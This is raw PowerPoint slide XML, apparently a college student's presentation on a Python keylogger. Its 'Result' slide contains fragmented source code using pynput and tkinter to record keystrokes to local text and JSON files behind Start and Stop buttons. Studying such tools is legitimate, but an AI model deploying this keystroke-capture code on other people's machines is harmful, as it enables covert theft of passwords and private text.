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4" d="100"/>
          <a:sy n="104" d="100"/>
        </p:scale>
        <p:origin x="114" y="120"/>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09-04-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104867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4/9/2024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5" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="702156"/>
            <a:ext cx="11029616" cy="1013800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048636"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p>
            <a:fld id="{2CED4963-E985-44C4-B8C4-FDD613B7C2F8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048638" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104863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0"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1"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2"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3"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6" name="Date Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{ED291B17-9318-49DB-B28B-6E5994AE9581}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048627"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8"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4/9/2024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0"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2"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3" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{B2497495-0637-405E-AE64-5CC7506D51F5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048644" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048645"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6" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="492855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048647"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Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7BFFD690-9426-415D-8B65-26881E07B2D4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048650" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104865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2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="988332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048653"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4"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6"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Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{04C4989A-474C-40DE-95B9-011C28B71673}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048658" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104865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5" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="729658"/>
            <a:ext cx="11029616" cy="592246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048616" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{5DB4ED54-5B5E-4A04-93D3-5772E3CE3818}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048617" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048618"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0" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{4EDE50D6-574B-40AF-946F-D52A04ADE379}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048661" name="Footer Placeholder 2"/>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3"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4"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5"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7" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605951" y="6456916"/>
            <a:ext cx="2844799" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{D82884F1-FFEA-405F-9602-3DCA865EDA4E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048668" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6452590"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048669"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9"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0"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1"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2" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7E18DB4A-8810-4A10-AD5C-D5E2C667F5B3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048633"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 and security</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U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>B</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S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>KINGS ENGINEERING COLLEGE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>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4"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p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en-IN">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a:xfrm>
            <a:off x="581192" y="729866"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048606" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346454" y="-7654081"/>
            <a:ext cx="4880610" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048607" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135374" y="1260162"/>
            <a:ext cx="2956335" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>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tk</a:t>
            </a:r>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tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>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 []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys =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generate_text_log</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with open('key_log.txt', "w+") as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keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key)</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with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>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wb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log</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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>json.dumps</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).encode()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key_log.write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key_list_bytes</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on_press</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if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{'Pressed':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flag = True</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{'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        )</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </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 keys</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keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    )</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if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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
        <p:nvSpPr>
          <p:cNvPr id="1048608" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409665" y="1348800"/>
            <a:ext cx="2956335" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>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keys = keys + str(key)</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generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(str(keys))</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listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyboard.Listener</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on_press</a:t>
            </a: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r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_release</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listener.start</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 Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")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def </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global listener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listener.stop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(text="Keylogger stopped.")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start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='normal')</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='disabled')</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root = Tk()</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root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("Keylogger")</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</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label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
